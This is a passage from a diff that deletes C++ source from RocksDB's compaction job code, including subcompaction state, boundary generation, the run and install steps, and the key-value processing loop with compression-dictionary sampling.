-  SubcompactionState(SubcompactionState&& o) { *this = std::move(o); }
-
-  SubcompactionState& operator=(SubcompactionState&& o) {
-    compaction = std::move(o.compaction);
-    start = std::move(o.start);
-    end = std::move(o.end);
-    status = std::move(o.status);
-    outputs = std::move(o.outputs);
-    outfile = std::move(o.outfile);
-    builder = std::move(o.builder);
-    current_output_file_size = std::move(o.current_output_file_size);
-    total_bytes = std::move(o.total_bytes);
-    num_input_records = std::move(o.num_input_records);
-    num_output_records = std::move(o.num_output_records);
-    compaction_job_stats = std::move(o.compaction_job_stats);
-    approx_size = std::move(o.approx_size);
-    grandparent_index = std::move(o.grandparent_index);
-    overlapped_bytes = std::move(o.overlapped_bytes);
-    seen_key = std::move(o.seen_key);
-    compression_dict = std::move(o.compression_dict);
-    return *this;
-  }
-
-  // Because member unique_ptrs do not have these.
-  SubcompactionState(const SubcompactionState&) = delete;
-
-  SubcompactionState& operator=(const SubcompactionState&) = delete;
-
-  // Returns true iff we should stop building the current output
-  // before processing "internal_key".
-  bool ShouldStopBefore(const Slice& internal_key, uint64_t curr_file_size) {
-    const InternalKeyComparator* icmp =
-        &compaction->column_family_data()->internal_comparator();
-    const std::vector<FileMetaData*>& grandparents = compaction->grandparents();
-
-    // Scan to find earliest grandparent file that contains key.
-    while (grandparent_index < grandparents.size() &&
-           icmp->Compare(internal_key,
-                         grandparents[grandparent_index]->largest.Encode()) >
-               0) {
-      if (seen_key) {
-        overlapped_bytes += grandparents[grandparent_index]->fd.GetFileSize();
-      }
-      assert(grandparent_index + 1 >= grandparents.size() ||
-             icmp->Compare(
-                 grandparents[grandparent_index]->largest.Encode(),
-                 grandparents[grandparent_index + 1]->smallest.Encode()) <= 0);
-      grandparent_index++;
-    }
-    seen_key = true;
-
-    if (overlapped_bytes + curr_file_size >
-        compaction->max_compaction_bytes()) {
-      // Too much overlap for current output; start new output
-      overlapped_bytes = 0;
-      return true;
-    }
-
-    return false;
-  }
-};
-
-// Maintains state for the entire compaction
-struct CompactionJob::CompactionState {
-  Compaction* const compaction;
-
-  // REQUIRED: subcompaction states are stored in order of increasing
-  // key-range
-  std::vector<CompactionJob::SubcompactionState> sub_compact_states;
-  Status status;
-
-  uint64_t total_bytes;
-  uint64_t num_input_records;
-  uint64_t num_output_records;
-
-  explicit CompactionState(Compaction* c)
-      : compaction(c),
-        total_bytes(0),
-        num_input_records(0),
-        num_output_records(0) {}
-
-  size_t NumOutputFiles() {
-    size_t total = 0;
-    for (auto& s : sub_compact_states) {
-      total += s.outputs.size();
-    }
-    return total;
-  }
-
-  Slice SmallestUserKey() {
-    for (const auto& sub_compact_state : sub_compact_states) {
-      if (!sub_compact_state.outputs.empty() &&
-          sub_compact_state.outputs[0].finished) {
-        return sub_compact_state.outputs[0].meta.smallest.user_key();
-      }
-    }
-    // If there is no finished output, return an empty slice.
-    return Slice(nullptr, 0);
-  }
-
-  Slice LargestUserKey() {
-    for (auto it = sub_compact_states.rbegin(); it < sub_compact_states.rend();
-         ++it) {
-      if (!it->outputs.empty() && it->current_output()->finished) {
-        assert(it->current_output() != nullptr);
-        return it->current_output()->meta.largest.user_key();
-      }
-    }
-    // If there is no finished output, return an empty slice.
-    return Slice(nullptr, 0);
-  }
-};
-
-void CompactionJob::AggregateStatistics() {
-  for (SubcompactionState& sc : compact_->sub_compact_states) {
-    compact_->total_bytes += sc.total_bytes;
-    compact_->num_input_records += sc.num_input_records;
-    compact_->num_output_records += sc.num_output_records;
-  }
-  if (compaction_job_stats_) {
-    for (SubcompactionState& sc : compact_->sub_compact_states) {
-      compaction_job_stats_->Add(sc.compaction_job_stats);
-    }
-  }
-}
-
-CompactionJob::CompactionJob(
-    int job_id, Compaction* compaction, const ImmutableDBOptions& db_options,
-    const EnvOptions& env_options, VersionSet* versions,
-    const std::atomic<bool>* shutting_down, LogBuffer* log_buffer,
-    Directory* db_directory, Directory* output_directory, Statistics* stats,
-    InstrumentedMutex* db_mutex, Status* db_bg_error,
-    std::vector<SequenceNumber> existing_snapshots,
-    SequenceNumber earliest_write_conflict_snapshot,
-    std::shared_ptr<Cache> table_cache, EventLogger* event_logger,
-    bool paranoid_file_checks, bool measure_io_stats, const std::string& dbname,
-    CompactionJobStats* compaction_job_stats)
-    : job_id_(job_id),
-      compact_(new CompactionState(compaction)),
-      compaction_job_stats_(compaction_job_stats),
-      compaction_stats_(1),
-      dbname_(dbname),
-      db_options_(db_options),
-      env_options_(env_options),
-      env_(db_options.env),
-      versions_(versions),
-      shutting_down_(shutting_down),
-      log_buffer_(log_buffer),
-      db_directory_(db_directory),
-      output_directory_(output_directory),
-      stats_(stats),
-      db_mutex_(db_mutex),
-      db_bg_error_(db_bg_error),
-      existing_snapshots_(std::move(existing_snapshots)),
-      earliest_write_conflict_snapshot_(earliest_write_conflict_snapshot),
-      table_cache_(std::move(table_cache)),
-      event_logger_(event_logger),
-      paranoid_file_checks_(paranoid_file_checks),
-      measure_io_stats_(measure_io_stats) {
-  assert(log_buffer_ != nullptr);
-  const auto* cfd = compact_->compaction->column_family_data();
-  ThreadStatusUtil::SetColumnFamily(cfd, cfd->ioptions()->env,
-                                    db_options_.enable_thread_tracking);
-  ThreadStatusUtil::SetThreadOperation(ThreadStatus::OP_COMPACTION);
-  ReportStartedCompaction(compaction);
-}
-
-CompactionJob::~CompactionJob() {
-  assert(compact_ == nullptr);
-  ThreadStatusUtil::ResetThreadStatus();
-}
-
-void CompactionJob::ReportStartedCompaction(
-    Compaction* compaction) {
-  const auto* cfd = compact_->compaction->column_family_data();
-  ThreadStatusUtil::SetColumnFamily(cfd, cfd->ioptions()->env,
-                                    db_options_.enable_thread_tracking);
-
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_JOB_ID,
-      job_id_);
-
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_INPUT_OUTPUT_LEVEL,
-      (static_cast<uint64_t>(compact_->compaction->start_level()) << 32) +
-          compact_->compaction->output_level());
-
-  // In the current design, a CompactionJob is always created
-  // for non-trivial compaction.
-  assert(compaction->IsTrivialMove() == false ||
-         compaction->is_manual_compaction() == true);
-
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_PROP_FLAGS,
-      compaction->is_manual_compaction() +
-          (compaction->deletion_compaction() << 1));
-
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_TOTAL_INPUT_BYTES,
-      compaction->CalculateTotalInputSize());
-
-  IOSTATS_RESET(bytes_written);
-  IOSTATS_RESET(bytes_read);
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_BYTES_WRITTEN, 0);
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_BYTES_READ, 0);
-
-  // Set the thread operation after operation properties
-  // to ensure GetThreadList() can always show them all together.
-  ThreadStatusUtil::SetThreadOperation(
-      ThreadStatus::OP_COMPACTION);
-
-  if (compaction_job_stats_) {
-    compaction_job_stats_->is_manual_compaction =
-        compaction->is_manual_compaction();
-  }
-}
-
-void CompactionJob::Prepare() {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_COMPACTION_PREPARE);
-
-  // Generate file_levels_ for compaction berfore making Iterator
-  auto* c = compact_->compaction;
-  assert(c->column_family_data() != nullptr);
-  assert(c->column_family_data()->current()->storage_info()
-      ->NumLevelFiles(compact_->compaction->level()) > 0);
-
-  // Is this compaction producing files at the bottommost level?
-  bottommost_level_ = c->bottommost_level();
-
-  if (c->ShouldFormSubcompactions()) {
-    const uint64_t start_micros = env_->NowMicros();
-    GenSubcompactionBoundaries();
-    MeasureTime(stats_, SUBCOMPACTION_SETUP_TIME,
-                env_->NowMicros() - start_micros);
-
-    assert(sizes_.size() == boundaries_.size() + 1);
-
-    for (size_t i = 0; i <= boundaries_.size(); i++) {
-      Slice* start = i == 0 ? nullptr : &boundaries_[i - 1];
-      Slice* end = i == boundaries_.size() ? nullptr : &boundaries_[i];
-      compact_->sub_compact_states.emplace_back(c, start, end, sizes_[i]);
-    }
-    MeasureTime(stats_, NUM_SUBCOMPACTIONS_SCHEDULED,
-                compact_->sub_compact_states.size());
-  } else {
-    compact_->sub_compact_states.emplace_back(c, nullptr, nullptr);
-  }
-}
-
-struct RangeWithSize {
-  Range range;
-  uint64_t size;
-
-  RangeWithSize(const Slice& a, const Slice& b, uint64_t s = 0)
-      : range(a, b), size(s) {}
-};
-
-// Generates a histogram representing potential divisions of key ranges from
-// the input. It adds the starting and/or ending keys of certain input files
-// to the working set and then finds the approximate size of data in between
-// each consecutive pair of slices. Then it divides these ranges into
-// consecutive groups such that each group has a similar size.
-void CompactionJob::GenSubcompactionBoundaries() {
-  auto* c = compact_->compaction;
-  auto* cfd = c->column_family_data();
-  const Comparator* cfd_comparator = cfd->user_comparator();
-  std::vector<Slice> bounds;
-  int start_lvl = c->start_level();
-  int out_lvl = c->output_level();
-
-  // Add the starting and/or ending key of certain input files as a potential
-  // boundary
-  for (size_t lvl_idx = 0; lvl_idx < c->num_input_levels(); lvl_idx++) {
-    int lvl = c->level(lvl_idx);
-    if (lvl >= start_lvl && lvl <= out_lvl) {
-      const LevelFilesBrief* flevel = c->input_levels(lvl_idx);
-      size_t num_files = flevel->num_files;
-
-      if (num_files == 0) {
-        continue;
-      }
-
-      if (lvl == 0) {
-        // For level 0 add the starting and ending key of each file since the
-        // files may have greatly differing key ranges (not range-partitioned)
-        for (size_t i = 0; i < num_files; i++) {
-          bounds.emplace_back(flevel->files[i].smallest_key);
-          bounds.emplace_back(flevel->files[i].largest_key);
-        }
-      } else {
-        // For all other levels add the smallest/largest key in the level to
-        // encompass the range covered by that level
-        bounds.emplace_back(flevel->files[0].smallest_key);
-        bounds.emplace_back(flevel->files[num_files - 1].largest_key);
-        if (lvl == out_lvl) {
-          // For the last level include the starting keys of all files since
-          // the last level is the largest and probably has the widest key
-          // range. Since it's range partitioned, the ending key of one file
-          // and the starting key of the next are very close (or identical).
-          for (size_t i = 1; i < num_files; i++) {
-            bounds.emplace_back(flevel->files[i].smallest_key);
-          }
-        }
-      }
-    }
-  }
-
-  std::sort(bounds.begin(), bounds.end(),
-    [cfd_comparator] (const Slice& a, const Slice& b) -> bool {
-      return cfd_comparator->Compare(ExtractUserKey(a), ExtractUserKey(b)) < 0;
-    });
-  // Remove duplicated entries from bounds
-  bounds.erase(std::unique(bounds.begin(), bounds.end(),
-    [cfd_comparator] (const Slice& a, const Slice& b) -> bool {
-      return cfd_comparator->Compare(ExtractUserKey(a), ExtractUserKey(b)) == 0;
-    }), bounds.end());
-
-  // Combine consecutive pairs of boundaries into ranges with an approximate
-  // size of data covered by keys in that range
-  uint64_t sum = 0;
-  std::vector<RangeWithSize> ranges;
-  auto* v = cfd->current();
-  for (auto it = bounds.begin();;) {
-    const Slice a = *it;
-    it++;
-
-    if (it == bounds.end()) {
-      break;
-    }
-
-    const Slice b = *it;
-    uint64_t size = versions_->ApproximateSize(v, a, b, start_lvl, out_lvl + 1);
-    ranges.emplace_back(a, b, size);
-    sum += size;
-  }
-
-  // Group the ranges into subcompactions
-  const double min_file_fill_percent = 4.0 / 5;
-  uint64_t max_output_files = static_cast<uint64_t>(
-      std::ceil(sum / min_file_fill_percent /
-                c->mutable_cf_options()->MaxFileSizeForLevel(out_lvl)));
-  uint64_t subcompactions =
-      std::min({static_cast<uint64_t>(ranges.size()),
-                static_cast<uint64_t>(db_options_.max_subcompactions),
-                max_output_files});
-
-  if (subcompactions > 1) {
-    double mean = sum * 1.0 / subcompactions;
-    // Greedily add ranges to the subcompaction until the sum of the ranges'
-    // sizes becomes >= the expected mean size of a subcompaction
-    sum = 0;
-    for (size_t i = 0; i < ranges.size() - 1; i++) {
-      sum += ranges[i].size;
-      if (subcompactions == 1) {
-        // If there's only one left to schedule then it goes to the end so no
-        // need to put an end boundary
-        continue;
-      }
-      if (sum >= mean) {
-        boundaries_.emplace_back(ExtractUserKey(ranges[i].range.limit));
-        sizes_.emplace_back(sum);
-        subcompactions--;
-        sum = 0;
-      }
-    }
-    sizes_.emplace_back(sum + ranges.back().size);
-  } else {
-    // Only one range so its size is the total sum of sizes computed above
-    sizes_.emplace_back(sum);
-  }
-}
-
-Status CompactionJob::Run() {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_COMPACTION_RUN);
-  TEST_SYNC_POINT("CompactionJob::Run():Start");
-  log_buffer_->FlushBufferToLog();
-  LogCompaction();
-
-  const size_t num_threads = compact_->sub_compact_states.size();
-  assert(num_threads > 0);
-  const uint64_t start_micros = env_->NowMicros();
-
-  // Launch a thread for each of subcompactions 1...num_threads-1
-  std::vector<port::Thread> thread_pool;
-  thread_pool.reserve(num_threads - 1);
-  for (size_t i = 1; i < compact_->sub_compact_states.size(); i++) {
-    thread_pool.emplace_back(&CompactionJob::ProcessKeyValueCompaction, this,
-                             &compact_->sub_compact_states[i]);
-  }
-
-  // Always schedule the first subcompaction (whether or not there are also
-  // others) in the current thread to be efficient with resources
-  ProcessKeyValueCompaction(&compact_->sub_compact_states[0]);
-
-  // Wait for all other threads (if there are any) to finish execution
-  for (auto& thread : thread_pool) {
-    thread.join();
-  }
-
-  if (output_directory_) {
-    output_directory_->Fsync();
-  }
-
-  compaction_stats_.micros = env_->NowMicros() - start_micros;
-  MeasureTime(stats_, COMPACTION_TIME, compaction_stats_.micros);
-
-  // Check if any thread encountered an error during execution
-  Status status;
-  for (const auto& state : compact_->sub_compact_states) {
-    if (!state.status.ok()) {
-      status = state.status;
-      break;
-    }
-  }
-
-  TablePropertiesCollection tp;
-  for (const auto& state : compact_->sub_compact_states) {
-    for (const auto& output : state.outputs) {
-      auto fn = TableFileName(db_options_.db_paths, output.meta.fd.GetNumber(),
-                              output.meta.fd.GetPathId());
-      tp[fn] = output.table_properties;
-    }
-  }
-  compact_->compaction->SetOutputTableProperties(std::move(tp));
-
-  // Finish up all book-keeping to unify the subcompaction results
-  AggregateStatistics();
-  UpdateCompactionStats();
-  RecordCompactionIOStats();
-  LogFlush(db_options_.info_log);
-  TEST_SYNC_POINT("CompactionJob::Run():End");
-
-  compact_->status = status;
-  return status;
-}
-
-Status CompactionJob::Install(const MutableCFOptions& mutable_cf_options) {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_COMPACTION_INSTALL);
-  db_mutex_->AssertHeld();
-  Status status = compact_->status;
-  ColumnFamilyData* cfd = compact_->compaction->column_family_data();
-  cfd->internal_stats()->AddCompactionStats(
-      compact_->compaction->output_level(), compaction_stats_);
-
-  if (status.ok()) {
-    status = InstallCompactionResults(mutable_cf_options);
-  }
-  VersionStorageInfo::LevelSummaryStorage tmp;
-  auto vstorage = cfd->current()->storage_info();
-  const auto& stats = compaction_stats_;
-
-  double read_write_amp = 0.0;
-  double write_amp = 0.0;
-  double bytes_read_per_sec = 0;
-  double bytes_written_per_sec = 0;
-
-  if (stats.bytes_read_non_output_levels > 0) {
-    read_write_amp = (stats.bytes_written + stats.bytes_read_output_level +
-                      stats.bytes_read_non_output_levels) /
-                     static_cast<double>(stats.bytes_read_non_output_levels);
-    write_amp = stats.bytes_written /
-                static_cast<double>(stats.bytes_read_non_output_levels);
-  }
-  if (stats.micros > 0) {
-    bytes_read_per_sec =
-        (stats.bytes_read_non_output_levels + stats.bytes_read_output_level) /
-        static_cast<double>(stats.micros);
-    bytes_written_per_sec =
-        stats.bytes_written / static_cast<double>(stats.micros);
-  }
-
-  ROCKS_LOG_BUFFER(
-      log_buffer_,
-      "[%s] compacted to: %s, MB/sec: %.1f rd, %.1f wr, level %d, "
-      "files in(%d, %d) out(%d) "
-      "MB in(%.1f, %.1f) out(%.1f), read-write-amplify(%.1f) "
-      "write-amplify(%.1f) %s, records in: %d, records dropped: %d\n",
-      cfd->GetName().c_str(), vstorage->LevelSummary(&tmp), bytes_read_per_sec,
-      bytes_written_per_sec, compact_->compaction->output_level(),
-      stats.num_input_files_in_non_output_levels,
-      stats.num_input_files_in_output_level, stats.num_output_files,
-      stats.bytes_read_non_output_levels / 1048576.0,
-      stats.bytes_read_output_level / 1048576.0,
-      stats.bytes_written / 1048576.0, read_write_amp, write_amp,
-      status.ToString().c_str(), stats.num_input_records,
-      stats.num_dropped_records);
-
-  UpdateCompactionJobStats(stats);
-
-  auto stream = event_logger_->LogToBuffer(log_buffer_);
-  stream << "job" << job_id_
-         << "event" << "compaction_finished"
-         << "compaction_time_micros" << compaction_stats_.micros
-         << "output_level" << compact_->compaction->output_level()
-         << "num_output_files" << compact_->NumOutputFiles()
-         << "total_output_size" << compact_->total_bytes
-         << "num_input_records" << compact_->num_input_records
-         << "num_output_records" << compact_->num_output_records
-         << "num_subcompactions" << compact_->sub_compact_states.size();
-
-  if (compaction_job_stats_ != nullptr) {
-    stream << "num_single_delete_mismatches"
-           << compaction_job_stats_->num_single_del_mismatch;
-    stream << "num_single_delete_fallthrough"
-           << compaction_job_stats_->num_single_del_fallthru;
-  }
-
-  if (measure_io_stats_ && compaction_job_stats_ != nullptr) {
-    stream << "file_write_nanos" << compaction_job_stats_->file_write_nanos;
-    stream << "file_range_sync_nanos"
-           << compaction_job_stats_->file_range_sync_nanos;
-    stream << "file_fsync_nanos" << compaction_job_stats_->file_fsync_nanos;
-    stream << "file_prepare_write_nanos"
-           << compaction_job_stats_->file_prepare_write_nanos;
-  }
-
-  stream << "lsm_state";
-  stream.StartArray();
-  for (int level = 0; level < vstorage->num_levels(); ++level) {
-    stream << vstorage->NumLevelFiles(level);
-  }
-  stream.EndArray();
-
-  CleanupCompaction();
-  return status;
-}
-
-void CompactionJob::ProcessKeyValueCompaction(SubcompactionState* sub_compact) {
-  assert(sub_compact != nullptr);
-  ColumnFamilyData* cfd = sub_compact->compaction->column_family_data();
-  std::unique_ptr<RangeDelAggregator> range_del_agg(
-      new RangeDelAggregator(cfd->internal_comparator(), existing_snapshots_));
-  std::unique_ptr<InternalIterator> input(versions_->MakeInputIterator(
-      sub_compact->compaction, range_del_agg.get()));
-
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_COMPACTION_PROCESS_KV);
-
-  // I/O measurement variables
-  PerfLevel prev_perf_level = PerfLevel::kEnableTime;
-  const uint64_t kRecordStatsEvery = 1000;
-  uint64_t prev_write_nanos = 0;
-  uint64_t prev_fsync_nanos = 0;
-  uint64_t prev_range_sync_nanos = 0;
-  uint64_t prev_prepare_write_nanos = 0;
-  if (measure_io_stats_) {
-    prev_perf_level = GetPerfLevel();
-    SetPerfLevel(PerfLevel::kEnableTime);
-    prev_write_nanos = IOSTATS(write_nanos);
-    prev_fsync_nanos = IOSTATS(fsync_nanos);
-    prev_range_sync_nanos = IOSTATS(range_sync_nanos);
-    prev_prepare_write_nanos = IOSTATS(prepare_write_nanos);
-  }
-
-  const MutableCFOptions* mutable_cf_options =
-      sub_compact->compaction->mutable_cf_options();
-
-  // To build compression dictionary, we sample the first output file, assuming
-  // it'll reach the maximum length, and then use the dictionary for compressing
-  // subsequent output files. The dictionary may be less than max_dict_bytes if
-  // the first output file's length is less than the maximum.
-  const int kSampleLenShift = 6;  // 2^6 = 64-byte samples
-  std::set<size_t> sample_begin_offsets;
-  if (bottommost_level_ &&
-      cfd->ioptions()->compression_opts.max_dict_bytes > 0) {
-    const size_t kMaxSamples =
-        cfd->ioptions()->compression_opts.max_dict_bytes >> kSampleLenShift;
-    const size_t kOutFileLen = mutable_cf_options->MaxFileSizeForLevel(
-        compact_->compaction->output_level());
-    if (kOutFileLen != port::kMaxSizet) {
-      const size_t kOutFileNumSamples = kOutFileLen >> kSampleLenShift;
-      Random64 generator{versions_->NewFileNumber()};
-      for (size_t i = 0; i < kMaxSamples; ++i) {
-        sample_begin_offsets.insert(generator.Uniform(kOutFileNumSamples)
-                                    << kSampleLenShift);
-      }
-    }
-  }
-
-  auto compaction_filter = cfd->ioptions()->compaction_filter;
-  std::unique_ptr<CompactionFilter> compaction_filter_from_factory = nullptr;
-  if (compaction_filter == nullptr) {
-    compaction_filter_from_factory =
-        sub_compact->compaction->CreateCompactionFilter();
-    compaction_filter = compaction_filter_from_factory.get();
-  }
-  MergeHelper merge(
-      env_, cfd->user_comparator(), cfd->ioptions()->merge_operator,
-      compaction_filter, db_options_.info_log.get(),
-      false /* internal key corruption is expected */,
-      existing_snapshots_.empty() ? 0 : existing_snapshots_.back(),
-      compact_->compaction->level(), db_options_.statistics.get(),
-      shutting_down_);
-
-  TEST_SYNC_POINT("CompactionJob::Run():Inprogress");
-
-  Slice* start = sub_compact->start;
-  Slice* end = sub_compact->end;
-  if (start != nullptr) {
-    IterKey start_iter;
-    start_iter.SetInternalKey(*start, kMaxSequenceNumber, kValueTypeForSeek);
-    input->Seek(start_iter.GetInternalKey());
-  } else {
-    input->SeekToFirst();
-  }
-
-  // we allow only 1 compaction event listener. Used by blob storage
-  CompactionEventListener* comp_event_listener = nullptr;
-#ifndef ROCKSDB_LITE
-  for (auto& celitr : cfd->ioptions()->listeners) {
-    comp_event_listener = celitr->GetCompactionEventListener();
-    if (comp_event_listener != nullptr) {
-      break;
-    }
-  }
-#endif  // ROCKSDB_LITE
-
-  Status status;
-  sub_compact->c_iter.reset(new CompactionIterator(
-      input.get(), cfd->user_comparator(), &merge, versions_->LastSequence(),
-      &existing_snapshots_, earliest_write_conflict_snapshot_, env_, false,
-      range_del_agg.get(), sub_compact->compaction, compaction_filter,
-      comp_event_listener, shutting_down_));
-  auto c_iter = sub_compact->c_iter.get();
-  c_iter->SeekToFirst();
-  if (c_iter->Valid() &&
-      sub_compact->compaction->output_level() != 0) {
-    // ShouldStopBefore() maintains state based on keys processed so far. The
-    // compaction loop always calls it on the "next" key, thus won't tell it the
-    // first key. So we do that here.
-    sub_compact->ShouldStopBefore(
-      c_iter->key(), sub_compact->current_output_file_size);
-  }
-  const auto& c_iter_stats = c_iter->iter_stats();
-  auto sample_begin_offset_iter = sample_begin_offsets.cbegin();
-  // data_begin_offset and compression_dict are only valid while generating
-  // dictionary from the first output file.
-  size_t data_begin_offset = 0;
-  std::string compression_dict;
-  compression_dict.reserve(cfd->ioptions()->compression_opts.max_dict_bytes);
-
-  while (status.ok() && !cfd->IsDropped() && c_iter->Valid()) {
-    // Invariant: c_iter.status() is guaranteed to be OK if c_iter->Valid()
-    // returns true.
-    const Slice& key = c_iter->key();
-    const Slice& value = c_iter->value();
-
-    // If an end key (exclusive) is specified, check if the current key is
-    // >= than it and exit if it is because the iterator is out of its range
-    if (end != nullptr &&
-        cfd->user_comparator()->Compare(c_iter->user_key(), *end) >= 0) {
-      break;
-    }
-    if (c_iter_stats.num_input_records % kRecordStatsEvery ==
-        kRecordStatsEvery - 1) {
-      RecordDroppedKeys(c_iter_stats, &sub_compact->compaction_job_stats);
-      c_iter->ResetRecordCounts();
-      RecordCompactionIOStats();
-    }
-
-    // Open output file if necessary
-    if (sub_compact->builder == nullptr) {
-      status = OpenCompactionOutputFile(sub_compact);
-      if (!status.ok()) {
-        break;
-      }
-    }
-    assert(sub_compact->builder != nullptr);
-    assert(sub_compact->current_output() != nullptr);
-    sub_compact->builder->Add(key, value);
-    sub_compact->current_output_file_size = sub_compact->builder->FileSize();
-    sub_compact->current_output()->meta.UpdateBoundaries(
-        key, c_iter->ikey().sequence);
-    sub_compact->num_output_records++;
-
-    if (sub_compact->outputs.size() == 1) {  // first output file
-      // Check if this key/value overlaps any sample intervals; if so, appends
-      // overlapping portions to the dictionary.
-      for (const auto& data_elmt : {key, value}) {
-        size_t data_end_offset = data_begin_offset + data_elmt.size();
-        while (sample_begin_offset_iter != sample_begin_offsets.cend() &&
-               *sample_begin_offset_iter < data_end_offset) {
-          size_t sample_end_offset =
-              *sample_begin_offset_iter + (1 << kSampleLenShift);
-          // Invariant: Because we advance sample iterator while processing the
-          // data_elmt containing the sample's last byte, the current sample
-          // cannot end before the current data_elmt.
-          assert(data_begin_offset < sample_end_offset);
-
-          size_t data_elmt_copy_offset, data_elmt_copy_len;
-          if (*sample_begin_offset_iter <= data_begin_offset) {
-            // The sample starts before data_elmt starts, so take bytes starting
-            // at the beginning of data_elmt.
-            data_elmt_copy_offset = 0;
-          } else {
-            // data_elmt starts before the sample starts, so take bytes starting
-            // at the below offset into data_elmt.
-            data_elmt_copy_offset =
-                *sample_begin_offset_iter - data_begin_offset;
-          }
-          if (sample_end_offset <= data_end_offset) {
-            // The sample ends before data_elmt ends, so take as many bytes as
-            // needed.
-            data_elmt_copy_len =
-                sample_end_offset - (data_begin_offset + data_elmt_copy_offset);
-          } else {
-            // data_elmt ends before the sample ends, so take all remaining
-            // bytes in data_elmt.
-            data_elmt_copy_len =
-                data_end_offset - (data_begin_offset + data_elmt_copy_offset);
-          }
-          compression_dict.append(&data_elmt.data()[data_elmt_copy_offset],
-                                  data_elmt_copy_len);
-          if (sample_end_offset > data_end_offset) {
-            // Didn't finish sample. Try to finish it with the next data_elmt.
-            break;
-          }
-          // Next sample may require bytes from same data_elmt.
-          sample_begin_offset_iter++;
-        }
-        data_begin_offset = data_end_offset;
-      }
-    }
-
-    // Close output file if it is big enough. Two possibilities determine it's
-    // time to close it: (1) the current key should be this file's last key, (2)
-    // the next key should not be in this file.
-    //
-    // TODO(aekmekji): determine if file should be closed earlier than this
-    // during subcompactions (i.e. if output size, estimated by input size, is
-    // going to be 1.2MB and max_output_file_size = 1MB, prefer to have 0.6MB
-    // and 0.6MB instead of 1MB and 0.2MB)
-    bool output_file_ended = false;
-    Status input_status;
-    if (sub_compact->compaction->output_level() != 0 &&
-        sub_compact->current_output_file_size >=
-            sub_compact->compaction->max_output_file_size()) {
-      // (1) this key terminates the file. For historical reasons, the iterator
-      // status before advancing will be given to FinishCompactionOutputFile().
-      input_status = input->status();
-      output_file_ended = true;
-    }
-    c_iter->Next();
-    if (!output_file_ended && c_iter->Valid() &&
-        sub_compact->compaction->output_level() != 0 &&
-        sub_compact->ShouldStopBefore(
-          c_iter->key(), sub_compact->current_output_file_size) &&
-        sub_compact->builder != nullptr) {
-      // (2) this key belongs to the next file. For historical reasons, the
-      // iterator status after advancing will be given to
-      // FinishCompactionOutputFile().
-      input_status = input->status();
-      output_file_ended = true;
-    }
-    if (output_file_ended) {
-      const Slice* next_key = nullptr;
-      if (c_iter->Valid()) {
-        next_key = &c_iter->key();
-      }
-      CompactionIterationStats range_del_out_stats;
-      status = FinishCompactionOutputFile(input_status, sub_compact,
-                                          range_del_agg.get(),
-                                          &range_del_out_stats, next_key);
-      RecordDroppedKeys(range_del_out_stats,
-                        &sub_compact->compaction_job_stats);
-      if (sub_compact->outputs.size() == 1) {
-        // Use dictionary from first output file for compression of subsequent
-        // files.
-        sub_compact->compression_dict = std::move(compression_dict);
-      }
-    }
-  }
-
-  sub_compact->num_input_records = c_iter_stats.num_input_records;
-  sub_compact->compaction_job_stats.num_input_deletion_records =
-      c_iter_stats.num_input_deletion_records;
-  sub_compact->compaction_job_stats.num_corrupt_keys =
-      c_iter_stats.num_input_corrupt_records;
-  sub_compact->compaction_job_stats.num_single_del_fallthru =
-      c_iter_stats.num_single_del_fallthru;
-  sub_compact->compaction_job_stats.num_single_del_mismatch =
-      c_iter_stats.num_single_del_mismatch;
-  sub_compact->compaction_job_stats.total_input_raw_key_bytes +=
-      c_iter_stats.total_input_raw_key_bytes;
-  sub_compact->compaction_job_stats.total_input_raw_value_bytes +=
-      c_iter_stats.total_input_raw_value_bytes;
-
-  RecordTick(stats_, FILTER_OPERATION_TOTAL_TIME,
-             c_iter_stats.total_filter_time);
-  RecordDroppedKeys(c_iter_stats, &sub_compact->compaction_job_stats);
-  RecordCompactionIOStats();
-
-  if (status.ok() && (shutting_down_->load(std::memory_order_relaxed) ||
-                      cfd->IsDropped())) {
-    status = Status::ShutdownInProgress(
-        "Database shutdown or Column family drop during compaction");
-  }
-  if (status.ok()) {
-    status = input->status();
-  }
-  if (status.ok()) {
-    status = c_iter->status();
-  }
-
-  if (status.ok() && sub_compact->builder == nullptr &&
-      sub_compact->outputs.size() == 0 &&
-      range_del_agg->ShouldAddTombstones(bottommost_level_)) {
-    // handle subcompaction containing only range deletions
-    status = OpenCompactionOutputFile(sub_compact);
-  }
-
-  // Call FinishCompactionOutputFile() even if status is not ok: it needs to
-  // close the output file.
-  if (sub_compact->builder != nullptr) {
-    CompactionIterationStats range_del_out_stats;
-    Status s = FinishCompactionOutputFile(
-        status, sub_compact, range_del_agg.get(), &range_del_out_stats);
-    if (status.ok()) {
-      status = s;
-    }
-    RecordDroppedKeys(range_del_out_stats, &sub_compact->compaction_job_stats);
-  }
-
-  if (measure_io_stats_) {
-    sub_compact->compaction_job_stats.file_write_nanos +=
-        IOSTATS(write_nanos) - prev_write_nanos;
-    sub_compact->compaction_job_stats.file_fsync_nanos +=
-        IOSTATS(fsync_nanos) - prev_fsync_nanos;
-    sub_compact->compaction_job_stats.file_range_sync_nanos +=
-        IOSTATS(range_sync_nanos) - prev_range_sync_nanos;
-    sub_compact->compaction_job_stats.file_prepare_write_nanos +=
-        IOSTATS(prepare_write_nanos) - prev_prepare_write_nanos;
-    if (prev_perf_level != PerfLevel::kEnableTime) {
-      SetPerfLevel(prev_perf_level);
-    }
-  }
-
-  sub_compact->c_iter.reset();
-  input.reset();
-  sub_compact->status = status;
-}
-
-void CompactionJob::RecordDroppedKeys(
-    const CompactionIterationStats& c_iter_stats,
-    CompactionJobStats* compaction_job_stats) {
-  if (c_iter_stats.num_record_drop_user > 0) {
-    RecordTick(stats_, COMPACTION_KEY_DROP_USER,
-               c_iter_stats.num_record_drop_user);
-  }
-  if (c_iter_stats.num_record_drop_hidden > 0) {
